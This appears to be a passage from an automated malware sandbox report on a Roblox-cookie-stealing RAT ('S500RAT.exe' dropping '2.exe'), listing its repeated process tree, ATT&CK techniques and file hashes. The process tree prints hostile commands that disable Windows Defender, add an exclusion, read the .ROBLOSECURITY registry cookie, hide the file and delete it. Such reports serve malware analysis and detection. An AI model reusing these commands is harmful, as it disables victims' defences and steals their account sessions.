        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        44⤵
        
        PID:744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        44⤵
        
        PID:1708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        44⤵
        
        PID:760
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        44⤵
        
        PID:1588
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        44⤵
        
        PID:1576
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        44⤵
        
        PID:3032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        44⤵
        
        PID:2992
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        44⤵
        Detects videocard installed
        
        PID:2644
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        44⤵
        
        PID:2820
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        45⤵
        Runs ping.exe
        
        PID:572
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        43⤵
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        44⤵
        Executes dropped EXE
        
        PID:2780
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        44⤵
        
        PID:472
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        45⤵
        Executes dropped EXE
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        45⤵
        
        PID:2904
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        46⤵
        Executes dropped EXE
        
        PID:2848
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        47⤵
        
        PID:2808
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        47⤵
        Views/modifies file attributes
        
        PID:112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        47⤵
        
        PID:1612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        47⤵
        
        PID:1016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        47⤵
        
        PID:1828
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        47⤵
        
        PID:1608
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        47⤵
        
        PID:2404
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        47⤵
        
        PID:2440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        47⤵
        
        PID:928
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        47⤵
        Detects videocard installed
        
        PID:1956
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        47⤵
        
        PID:1476
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        48⤵
        Runs ping.exe
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        46⤵
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        47⤵
        Executes dropped EXE
        
        PID:1628
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        47⤵
        
        PID:892
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        48⤵
        Executes dropped EXE
        
        PID:1860
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        49⤵
        
        PID:1396
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        49⤵
        Views/modifies file attributes
        
        PID:1948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        49⤵
        
        PID:2176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        49⤵
        
        PID:1688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        49⤵
        
        PID:1928
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        49⤵
        
        PID:1700
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        49⤵
        
        PID:2072
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        49⤵
        
        PID:1408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        49⤵
        
        PID:1844
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        49⤵
        Detects videocard installed
        
        PID:2096
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        49⤵
        
        PID:2900
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        50⤵
        Runs ping.exe
        
        PID:2628
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        48⤵
        
        PID:2992
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        49⤵
        Executes dropped EXE
        
        PID:1404
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        49⤵
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        50⤵
        Executes dropped EXE
        
        PID:1492
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        51⤵
        
        PID:2932
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        51⤵
        Views/modifies file attributes
        
        PID:1576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        51⤵
        
        PID:576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        51⤵
        
        PID:2192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        51⤵
        
        PID:1432
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        51⤵
        
        PID:2320
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        51⤵
        
        PID:1628
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        51⤵
        
        PID:2772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        51⤵
        
        PID:2508
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        51⤵
        Detects videocard installed
        
        PID:1972
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        51⤵
        
        PID:1352
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        52⤵
        Runs ping.exe
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        50⤵
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        51⤵
        Executes dropped EXE
        
        PID:1704
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        51⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        52⤵
        Executes dropped EXE
        
        PID:1396
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        52⤵
        
        PID:1920
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        53⤵
        Executes dropped EXE
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        53⤵
        
        PID:3028
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        54⤵
        Executes dropped EXE
        
        PID:1156
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        55⤵
        
        PID:2972
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        55⤵
        Views/modifies file attributes
        
        PID:2136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        55⤵
        
        PID:112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        55⤵
        
        PID:2188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        55⤵
        
        PID:1640
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        55⤵
        
        PID:2448
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        55⤵
        
        PID:2564
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        55⤵
        
        PID:772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        55⤵
        
        PID:2256
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        55⤵
        Detects videocard installed
        
        PID:1248
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        55⤵
        
        PID:2532
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        56⤵
        Runs ping.exe
        
        PID:1200
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        54⤵
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        55⤵
        Executes dropped EXE
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        55⤵
        
        PID:1236
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        56⤵
        Executes dropped EXE
        
        PID:848
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        56⤵
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        57⤵
        Executes dropped EXE
        
        PID:2440
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        58⤵
        
        PID:2120
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        58⤵
        Views/modifies file attributes
        
        PID:2644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        58⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        58⤵
        
        PID:2064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        58⤵
        
        PID:2280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        58⤵
        
        PID:2380
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        58⤵
        
        PID:3064
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        58⤵
        
        PID:2268
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        58⤵
        
        PID:1008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        58⤵
        
        PID:1668
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        58⤵
        Detects videocard installed
        
        PID:760
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        58⤵
        
        PID:1628
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        59⤵
        Runs ping.exe
        
        PID:856
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        57⤵
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        58⤵
        Executes dropped EXE
        
        PID:1784
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        58⤵
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        59⤵
        Executes dropped EXE
        
        PID:1976
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        60⤵
        
        PID:1928
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        60⤵
        Views/modifies file attributes
        
        PID:2404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        60⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        60⤵
        
        PID:2904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        60⤵
        
        PID:788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        60⤵
        
        PID:1656
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        60⤵
        
        PID:1592
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        60⤵
        
        PID:848
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        60⤵
        
        PID:2388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        60⤵
        
        PID:696
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        60⤵
        Detects videocard installed
        
        PID:1920
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        60⤵
        
        PID:2144
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        61⤵
        Runs ping.exe
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        59⤵
        
        PID:2036
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        60⤵
        Executes dropped EXE
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        60⤵
        
        PID:1952

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2.exe

Filesize
227KB

MD5
de0f463cfcf942610b612b164016b2e6

SHA1
5cbb5145184df571500cb9bca5d270354894db12

SHA256
733232e7823e2b9f845abb3c37d6346f2d0ca52ad170d5e835c8b60a7e5f9e02

SHA512
fa4cf17050d8602df09b3761b97d52c0fd1f4e101822f706bbf07d3644500d82122e31fea42ff91725a3a30aea71789e03c572413ad9e6d65d6c8e3537523f40

Download Submit
C:\Users\Admin\AppData\Local\Temp\8QGRWTVDmYBt5dg\Browsers\Cookies\Chrome Cookies.txt

Filesize
224B

MD5
9f10c2ba5247c4719b1c08e73aa6342f

SHA1
db1695ae88cb0a07bfda8996df495e0b9f94852a

SHA256
8ce8eee1d55ffbb23ac85979a6e866210b2911bbf6a6662211893f1bb17986fe

SHA512
d2acb6e0bcd985126aa6e27b583b7142a64980dc63df5da2eba5100c66f970e6e7aa1046ef60e9f6be5b7bf617a4ffd61cee39d35d88fcc7ff47330d76aee176

Download Submit
C:\Users\Admin\AppData\Local\Temp\8QGRWTVDmYBt5dg\Display\Display.png

Filesize
363KB

MD5
535dc6f72107a878519ff612949d3160

SHA1
102950ee70275caa7b1cc21fbf394712274feb9f

SHA256
add47a37c5d8d9e071b9959a68eb9a1479db88201922d1d5b55de3a0e403dd1d

SHA512
6ddca5f28a6cd6ecfc7daf3cf01a9b889035cb4508cb767b85177a660d36f0b61c262a6907806c7acb508bb0a6510b256ae0a3961baa1ee768f5347535419821

Download Submit
C:\Users\Admin\AppData\Local\Temp\WcbfVeIKSQrIit4

Filesize
20KB

MD5
98f037d817fab56663beb1d2689d9f8a

SHA1
92bc20349b3b75853901489be8e07614a0eec4aa

SHA256
fa3995d1338b8784b150aaef789585766408fc97aed93cf9c44aeaa705beeeaf

SHA512
d9a73fe4b19238a784ddc9212c5eb146a59302370d883ad70dd01dac28f8f67eb9af4c5ab4d2deb2d35b519d936fde8d0fd1defe3f227c8f08f4bc7d147b12cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\gD7SkXZnbtoaO5Z

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7224e06e6504cb00f3c14cfa52be5d0f

SHA1
ee376fc15af9ee57058dd0810af3f13c98cbfa8e

SHA256
ce4f706070f1ae8130cf1b5f45039b04a4de64ef38aa4cb1017d0177b2b178b5

SHA512
0ac1ccf36b5bf41e3793ac7f05a7fd1f1432825d5108a7fae46f9f6ca22a7d483b85ee5d06a6e0dd0811b4434057589271a9106d64d7d53aae206d4fd14706f0

Download Submit
memory/956-383-0x0000000001340000-0x0000000001380000-memory.dmp

Filesize
256KB

Download
memory/1152-235-0x0000000000FA0000-0x0000000000FE0000-memory.dmp

Filesize
256KB

Download
memory/1400-53-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/1976-661-0x0000000000120000-0x0000000000160000-memory.dmp

Filesize
256KB

Download
memory/2148-347-0x0000000000F10000-0x0000000000F50000-memory.dmp

Filesize
256KB

Download
memory/2312-9-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

Filesize
9.9MB

Download
memory/2312-58-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

Filesize
9.9MB

Download
memory/2312-8-0x0000000000FF0000-0x0000000001030000-memory.dmp

Filesize
256KB

Download
memory/2336-191-0x00000000000E0000-0x0000000000120000-memory.dmp

Filesize
256KB

Download
memory/2392-0-0x000007FEF54F3000-0x000007FEF54F4000-memory.dmp

Filesize
4KB

Download
memory/2392-5-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

Filesize
9.9MB

Download
memory/2392-1-0x00000000009F0000-0x000000000165E000-memory.dmp

Filesize
12.4MB

Download
memory/2392-10-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp

Filesize
9.9MB

Download
memory/2504-146-0x00000000012E0000-0x0000000001320000-memory.dmp

Filesize
256KB

Download
memory/2592-311-0x0000000000240000-0x0000000000280000-memory.dmp

Filesize
256KB

Download
memory/2952-60-0x00000000012A0000-0x00000000012E0000-memory.dmp

Filesize
256KB

Download
memory/3024-24-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download
memory/3024-23-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

Filesize
2.9MB

Download
memory/3028-15-0x000000001B4D0000-0x000000001B7B2000-memory.dmp

Filesize
2.9MB

Download
memory/3028-17-0x0000000002260000-0x0000000002268000-memory.dmp

Filesize
32KB

Download